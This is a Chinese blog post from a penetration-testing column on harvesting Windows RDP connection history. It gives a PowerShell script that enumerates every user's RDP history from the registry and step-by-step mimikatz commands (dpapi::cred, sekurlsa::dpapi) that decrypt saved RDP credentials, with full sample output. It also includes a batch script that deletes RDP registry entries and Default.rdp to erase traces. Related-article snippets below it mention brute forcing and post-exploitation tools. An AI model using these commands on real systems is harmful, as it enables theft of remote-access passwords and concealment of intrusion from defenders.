windows获取RDP连接记录

最新推荐文章于 2024-08-29 08:01:46 发布
最新推荐文章于 2024-08-29 08:01:46 发布
阅读量5.8k 收藏 7
点赞数 3
分类专栏: 渗透技巧 文章标签: 渗透技巧
我希望自己永远怀着一颗学习的心!
本文链接:https://blog.csdn.net/q1352483315/article/details/100075078
版权

0x01 获取RDP连接历史记录:

以下代码为3gStudent实现的获取连接记录的代码:

<#
.SYNOPSIS
This script will list the logged-in users' RDP Connections History.
Author: 3gstudent@3gstudent
License: BSD 3-Clause
#>
$AllUser = Get-WmiObject -Class Win32_UserAccount
foreach($User in $AllUser)
{
	$RegPath = "Registry::HKEY_USERS\"+$User.SID+"\Software\Microsoft\Terminal Server Client\Servers\"
	Write-Host "User:"$User.Name
	Write-Host "SID:"$User.SID
	Write-Host "Status:"$User.Status
	Try  
    	{ 
		$QueryPath = dir $RegPath -Name -ErrorAction Stop
	}
	Catch
	{
		Write-Host "No RDP Connections History"
		Write-Host "----------------------------------"
		continue
	}
	foreach($Name in $QueryPath)
	{   
		Try  
    		{  
    			$User = (Get-ItemProperty -Path $RegPath$Name -ErrorAction Stop).UsernameHint
    			Write-Host "User:"$User
    			Write-Host "Server:"$Name
    		}
    		Catch  
    		{
			Write-Host "No RDP Connections History"
    		}
	}
	Write-Host "----------------------------------"	
}

用法:powershell xxx.ps1

0x02 破解RDP连接凭证:

破解RDP连接凭证的前提是用户在连接远程主机时勾选了保存保存凭证。
在这里插入图片描述

1、查找本地的Credentials

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

在这里插入图片描述

2、使用mimikatz进行操作

mimikatz dpapi::cred /in:C:\Users\dell\AppData\Local\Microsoft\Credentials\AB07963F1A0A1CB56827E93395597FC6

得到:

mimikatz # dpapi::cred /in:C:\Users\dell\AppData\Local\Microsoft\Credentials\AB07963F1A0A1CB56827E93395597FC6
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {ffc994a1-de8d-4304-9416-31e587f7a8ca}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 00000030 - 48
  szDescription      : Local Credential Data

  algCrypt           : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen      : 00000100 - 256
  dwSaltLen          : 00000020 - 32
  pbSalt             : 00fed8ca7ec6d44585dd1fbd8b57e77b6ab0cf318ec5d52d09fd0694ffb89ccb
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen       : 00000200 - 512
  dwHmac2KeyLen      : 00000020 - 32
  pbHmack2Key        : b49ef55f909fa503eda37ddc797c83c99df983920bfb4628e07aac5cb32bb530
  dwDataLen          : 000000b0 - 176
  pbData             : 4083f8f501b999a35c4aa57ce732bf52d30a6e604dac5a91b6fd3e65660c52a536025c5126f0d12b85044498deef08a8688b3459f49514ed6ae46271a1cb4cd0e70845d9b6beccbcbe85dead0fb7c80b4f7810add87b75c48592fcbfbbfd94fa4eee8004f8cf6d9619ef4b9af643f4c9ef0e8a2a5b0cd00530a5638cfd114fee4b735ac12eef2c7e6a0364845eb0ee4b3ab121e33324f8d5af48f3422bd47a76ab5e9e9e5a1a383e22fff8bf851b6a2a
  dwSignLen          : 00000040 - 64
  pbSign             : 7c8dbe7991c6af4d3bfc9f808790a0904738d0ca227bc2ee20ee26cbf06487dd2679e932b27ea0c0cbbe590ee6430641605d7001b2158c8873c5d6a09a9855a8

接下来需要使用的就是guidMasterKey、pbData数据。pbData是凭据的加密数据,guidMasterKey是凭据的GUID

3、使用sekurlsa::dpapi

mimikatz privilege::debug sekurlsa::dpapi

在这里插入图片描述

根据目标凭据GUID: {ffc994a1-de8d-4304-9416-31e587f7a8ca}找到其关联的MasterKey,这个MasterKey就是加密凭据的密钥,即解密pbData所必须的东西。

4、解密

dpapi::cred /in:C:\Users\dell\AppData\Local\Microsoft\Credentials\AB07963F1A0A1CB56827E93395597FC6 /masterkey:e01320a53bf9d57da1163c7723a5b3901df5a3fc8e504fc021def2637d19d34c0084a3ac2a0daab3fb9af3f98c48a9a901627dc4b10db087cb357e1d2f8aa18c

下面这段MasterKey:
e01320a53bf9d57da1163c7723a5b3901df5a3fc8e504fc021def2637d19d34c0084a3ac2a0daab3fb9af3f98c48a9a901627dc4b10db087cb357e1d2f8aa18c

在这里插入图片描述

0x03 清除RDP连接历史记录:

注册表HKCU:\Software\Microsoft\Terminal Server Client\

针对上述的Default、Server,对其表项进行删除

在这里插入图片描述
tips:由于在删除Server表项的时候无法一次选择所有表项,因为可以直接删除整个Server再新建。

然后删除默认的rdp连接文件:

@echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f # 删除Default中的所有值
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f # 删除整个Servers
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" 重新创建删除的注册表项
cd %userprofile%\documents\ # 转到Default.rdp文件目录
attrib Default.rdp -s -h # 更改Default.rdp文件属性,默认情况下它是隐藏
del Default.rdp  # 删除文件Default.rdp文件

以上参考链接:https://rcoil.me/2018/05/%E5%85%B3%E4%BA%8Ewindows%E7%9A%84RDP%E8%BF%9E%E6%8E%A5%E8%AE%B0%E5%BD%95/

小鱼儿waha
关注
专栏目录
List-RDP-Connections-History:使用powershell列出已登录用户或所有用户的RDP连接历史记录
04-29
列表-RDP-连接历史 使用powershell列出已登录用户或所有用户的RDP连接历史记录 列出已登录用户的RDP连接历史记录 枚举HKEY_USERS“ + $ User.SID +” \ Software \ Microsoft \ Terminal Server Client \ Servers \的注册表项值 列出所有用户的RDP连接历史记录 实现思路: 首先使用“ reg load”加载配置单元。 然后从HKEY_USERS阅读RDP连接历史记录。 最后,您需要使用“ reg卸载”来卸载配置单元。 笔记: 该脚本会自动执行上述操作,无需GUI。 :) 更多细节:
内网工具|读取正反向连接RDP记录
公众号:乌云安全
10-24 1757
C# 读取本机对外RDP连接记录和其他主机对该主机的连接记录,从而在内网渗透获取更多可通内网网段信息以及定位运维管理人员主机。
告别痕迹:远程桌面连接历史和凭据的清零指南
HaiJaine的博客
07-31 1296
本文指出在工作中运用 Windows 远程桌面工具时,因安全与隐私因素,有时需删除连接的历史记录和凭据。文中给出了一个相关的 PowerShell 脚本,还说明了其使用方法,涵盖运行 PowerShell 的条件、CredentialManager 模块的安装、脚本的执行流程及输入选择等,同时提到了一些注意事项。
内网渗透测试:获取远程桌面连接记录RDP 凭据
qq_53058639的博客
08-20 858
Windows 远程桌面是用于管理 Windows服务器的最广泛使用的工具之一。管理员喜欢使用远程桌面,攻击者也喜欢使用(狗头)。在之前的文章中我们已经介绍了很多攻击远程桌面的方法,本篇文章我们继续来探究。在渗透测试中,RDP远程桌面连接的历史记录不可忽视,根据历史连接记录我们往往能够定位出关键的服务器。并且,当我们发现了某台主机上存在远程桌面的连接记录,我们还可以想办法获取其远程桌面登录历史的连接凭据。用于登录RDP 远程桌面会话的凭据通常具有特权,这使它们成为红队操作期间的完美目标。
推荐文章:探索Windows RDP连接历史的钥匙 —— List-RDP-Connections-History
最新发布
gitblog_00576的博客
08-29 561
推荐文章:探索Windows RDP连接历史的钥匙 —— List-RDP-Connections-History List-RDP-Connections-History项目地址:https://gitcode.com/gh_mirrors/li/List-RDP-Connections-History 项目介绍 在日常系统管理或安全审计中,了解用户的远程桌面连接历史变得尤为重要。List-R...
rdp(远程终端登录记录
06-26
rdp(远程终端登录记录),主要是记录某个用户使用远程终端登录服务器·
SharpRDPLog:Windows rdp相关的登录记录导出工具,可用于后渗透Windows服务器的信息收集阶段。输出内容包括:本地rdp端口、mstsc缓存、cmdkey缓存、登录成功、失败日志事件
05-29
Windows rdp相关的登录记录导出工具,用于后渗透Windows服务器的RDP相关的信息收集。输出内容包括:本地rdp端口、mstsc缓存、cmdkey缓存、登录成功、失败日志事件。 运行前需要bypassUAC后的管理员权限权限 说明 ...
Python-获得Windows系统的远程桌面连接历史记录
08-10
总之,通过Python调用PowerShell,我们可以轻松地获取和分析Windows系统的RDP连接历史记录,这对于系统管理员来说是一个非常实用的工具,可以帮助他们更好地理解和管理他们的网络环境。在实际应用中,还可以根据需要...
一款基于go的windows信息收集工具,主要收集目标机器rdp端口、mstsc远程连接记录
05-24
一款基于go的windows信息收集工具,主要收集目标机器rdp端口、mstsc远程连接记录、mstsc密码和安全事件中4624、4625登录事件记录Go语言(也称为Golang)是由Google开发的一种静态强类型、编译型的编程语言。...
windrpm:Windows 2019 RDP由Mkastro To SA
04-04
1. **Windows Server 2019 RDP**: RDP是微软提供的远程桌面服务,允许用户通过网络连接到另一台计算机上进行操作。理解RDP的工作原理、配置选项以及安全性设置是必要的。 2. **RDP优化**: 项目可能涉及到如何提升...
ListRDPConnections:C#读取本机对外RDP连接记录和其他主机该主机的连接记录,从而内部网渗透获取更多可通内网网段信息以及定位运维管理人员主机
03-20
ListRDPConnections 简介 C#读取本机对外RDP连接记录和其他主机该主机的连接记录,从而内部网渗透获取更多可通内网网段信息以及定位运维管理人员主机 原理 对外RDP连接记录 对外RDP连接记录保存在HKEY_USERS\[SID]\Software\Microsoft\Terminal Server Client\下,只能包含包含用户设置和已登录用户的信息 未登录用户连接记录需要通过加载对应用户目录下的NTUSER.DAT到主轴中并读取来实现 需要有SeBackupPrivilege和SeRestorePrivilege这部分权限才可以实现对插入的读和写操作 对内RDP连接记录 对内RDP连接记录保存在Windows事件日志中(eventvwr),以便获取更多连接信息,不再区分是否是通过RDP登录 一个完整的rdp登录->注销过程包括网络连接->身份认证->登录->注销
远程桌面的连接登录日志记录
10-19
使用2003的远程桌面功能,可以创建登陆日志记录文件。
windows 远程连接debian_Windows远程连接Linux
weixin_31560545的博客
12-29 794
目录xrdp方式----------------------------------------------------------------------------------------------------------------------------------------------------------一般情况下我们用ssh客户端远程登陆inux系统,至于图形界面下的linux...
rdp连接工具_如何在Windows10中清除RDP连接历史记录
weixin_39915605的博客
11-30 1831
如何在Windows中清除RDP连接历史记录?内置的Windows远程桌面连接(RDP)客户端(mstsc.exe)保存每次成功连接到远程计算机后的远程计算机名(或IP地址)和用于登录的用户名。在下一次启动时,RDP客户端向用户提供选择以前使用的连接之一的功能。用户可以从列表中选择RDS / RDP主机的名称,客户端将自动填写先前用于登录的用户名。从最终用户的角度来看,这很方便,但是从安全角度来看...
powershell 登录 rdp_RDP登录日志取证和清除
weixin_39998903的博客
11-27 1246
点击上方“蓝字”关注公众号获取最新信息!本文作者:whoam1@奇安信首发地址:https://paper.seebug.org/1043这篇文章由Cream朋友whoam1@奇安信授权发布,在此表示感谢,关于其他方面的文章或者技术可以浏览whoam1的博客!后期我们也会持续更新WEB安全系列课程(从小白到“入狱”),0.0,希望多多关注支持。公众号可以搜索:贝塔安全实验室,谢谢,Cre...
Windows日志分析--rdp远程登录、暴破
weixin_51876282的博客
01-22 1584
rdp 服务器通常不喜欢很多连接,使用 -t 1 或 -t 4 来减少并行连接的数量,使用 -W 1 或 -W 3 在连接之间等待以允许服务器恢复。Win+R,输入eventvwr.msc,查看日志,可以使用4624,4625分别筛选出登录成功和登录失败的日志。username.txt 和 password.txt ,这里为了能快速的暴破出来,可以使用小一点的密码本。可视化界面,用着很舒服,就是导入的时候比较慢,右上角Filter可以进行关键词筛选。这样查看会比较乱,最好使用工具来进行查看。
查看域内RDP连接记录获取密码
weixin_43873557的博客
02-08 1383
https://github.com/3gstudent/List-RDP-Connections-History.git powershell -exec bypass ./ListAllUser.ps1 本地RDP连接密码解密 • Mimikatz 查看本地机器本地连接过的目标机器: reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers” /s 查看本地用户此目录下是否存有RDP密码文件: dir /
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值